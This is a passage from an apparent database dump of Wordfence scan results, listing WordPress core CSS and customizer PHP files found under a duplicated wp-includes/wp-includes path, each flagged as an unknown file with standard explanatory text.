target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/wp-embed-template-ie.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77343,1675048821,1675048821,'new','knownfile',75,'e0c3a90083266e668997940e9e4a951c','39d8afcb947f1718b5dadc1a5bcef679','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-embed-template.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77344,1675048822,1675048822,'new','knownfile',75,'c946c101f926ed9926b375a90923b8fa','a24c90b335bf72d630d72b84b3b2fd75','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/wp-embed-template.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77345,1675048822,1675048822,'new','knownfile',75,'f7486c2245c954608559a25b4ad44a40','a3948af57241c7073466ffc0f7f88da1','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/wp-pointer-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77346,1675048822,1675048822,'new','knownfile',75,'9ec062f7a8d2cd16103e04d94438a414','d1193707ae29aef7e7f3cd8618d146da','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/wp-pointer-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77347,1675048822,1675048822,'new','knownfile',75,'1f9d67a489fb3973bd6f946577fdd9ab','3e591ec3cb6771ca19cab5cbc883acb3','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/wp-pointer.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77348,1675048822,1675048822,'new','knownfile',75,'70a7cd994c416cf40ed863ec96db1d46','e3b055c37659793914880dd67719ed51','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/wp-pointer.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77349,1675048822,1675048822,'new','knownfile',75,'0baa74ba8018bcb6bacf24346034398a','8c0d473a2c02f4fe93b34fe5448cc352','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77350,1675048822,1675048822,'new','knownfile',75,'0e9002feca4fcd39851a20bacf2b7d53','e2964a460bb4a7666f36381394759ba3','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77351,1675048822,1675048822,'new','knownfile',75,'17fce30c3092739b8cd17082c3ae8eff','9a8027e662384e0694ed558d8c9725a0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:84:\"wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77352,1675048822,1675048822,'new','knownfile',75,'200c11ffca2bd6ecac12554291e68ac6','f734d8b64334203a04b05f124644dfe0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77353,1675048822,1675048822,'new','knownfile',75,'1c058a105bd3e3b70e9fb39655621f52','e11c536d66badc3921e2ebaa6c3804cd','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-color-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-color-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77354,1675048822,1675048822,'new','knownfile',75,'c2dfbd83f54fc21dddeb889b33d642fb','de9539813ab19346ffd86ade21ae31cf','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77355,1675048822,1675048822,'new','knownfile',75,'16cc63395efd580c595a5e81aefb1283','617a20728ff325807f433f147d54c4e8','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77356,1675048822,1675048822,'new','knownfile',75,'61a2ab1fc5449eea6264f581bdb0bcd6','9625b8ef659c2fa5d3c3a10a7813debc','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77357,1675048823,1675048823,'new','knownfile',75,'e2e1ce854cc101c2bda016bc7efc1bd0','608fe7707e764fb0d045fa78e6eb35ac','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77358,1675048823,1675048823,'new','knownfile',75,'dd2befdf77d2284d7b2526a60c757013','c6cdac312f5d7fb65321829d0a174869','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77359,1675048823,1675048823,'new','knownfile',75,'c66e85a4f1a8da928646b6f23faf865a','0bd25cc07376ce7f23ef59b022205652','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:77:\"wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77360,1675048823,1675048823,'new','knownfile',75,'f28b1ad7753e45de9ecc509951e3e07b','24af6e7f98ab60e148ca3e1a1efdba49','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-image-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-image-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77361,1675048823,1675048823,'new','knownfile',75,'1c856bb3c04c7a0ab24729104e357e73','2cd55236b515eb0d2d67d120016b83f0','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-media-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/customize/class-wp-customize-media-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77362,1675048823,1675048823,'new','knownfile',75,'e5f2591df261567283863166953e12bc','db8ae254a910f8e8018a5f18318331f4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77363,1675048823,1675048823,'new','knownfile',75,'e3914da47907028622869ed7e37a2378','79bc3cffe7302d75a99ba3be6b3a4e71','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77364,1675048823,1675048823,'new','knownfile',75,'b27b6ed07c6c25c2331617e2141c4991','139c8773e435c98b2f22fec0dbdf9a69','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77365,1675048823,1675048823,'new','knownfile',75,'656f02f63ef60b96f355969c60fafc77','d51a45fcc23a1fa623c869387033077d','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77366,1675048824,1675048824,'new','knownfile',75,'27528309b2c7cd1ef1a3900f4f0d3b98','5762f4f954f8777edcb0c5cf9e92384c','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:82:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77367,1675048824,1675048824,'new','knownfile',75,'a79b2d67b9d9c4079f60344190a6ed1c','2a111821a3d0e8bda74819be5a5a1d21','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77368,1675048824,1675048824,'new','knownfile',75,'03e9cf5ef8c3d18840773af7e7b1f69e','12a5863706a030eb45edfaf2fa1371d1','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77369,1675048824,1675048824,'new','knownfile',75,'ea0fd5fe8342e8092f7304910ebe9780','8b5da127b56861b3b23256a4385b0fd4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77370,1675048824,1675048824,'new','knownfile',75,'571b27f4af027769e9bb771241355595','37cc82269c8c65ce4fe4fdc07d16c54f','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77371,1675048824,1675048824,'new','knownfile',75,'b40eef292aa94aea593a4b96d8f9199b','e318a5309cce42fa0218f439aca95ec4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77372,1675048824,1675048824,'new','knownfile',75,'8214b3fd260f0956f70f6ad2f834bc9a','e3ff681fc1dd8a74eb633589d60b0ad4','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77373,1675048824,1675048824,'new','knownfile',75,'c4f0d1d332f53267db22cd98b01b1c6e','21e953c70d9bdb8766ccacda812d300a','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77374,1675048824,1675048824,'new','knownfile',75,'38fe581e1d3e77f1f63be7ea6a3df951','2ccfe6e0e5ea3181de1c6f927679e980','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-partial.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/customize/class-wp-customize-partial.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77375,1675048824,1675048824,'new','knownfile',75,'e6463b608cfea23d00f5155fd357645f','c89ce73f11f584f14de63e33aba25b6c','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77376,1675048824,1675048824,'new','knownfile',75,'8224e2952ce77de2e96b49e2af9ec746','8f7f0858acada66bd0023daa14ee2152','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77377,1675048824,1675048824,'new','knownfile',75,'a10a6aa05e33f8495e4ae9d311d1020c','024dda876c5dbd9c1e988b0bbc41a74b','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77378,1675048824,1675048824,'new','knownfile',75,'5f908d461bf00e1e121a26c2f9f99bb8','95cb6a8a2f149ed9c2df42c4546becf5','Unknown file in WordPress core: wp-includes/wp-includes/customize/class-wp-customize-theme-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 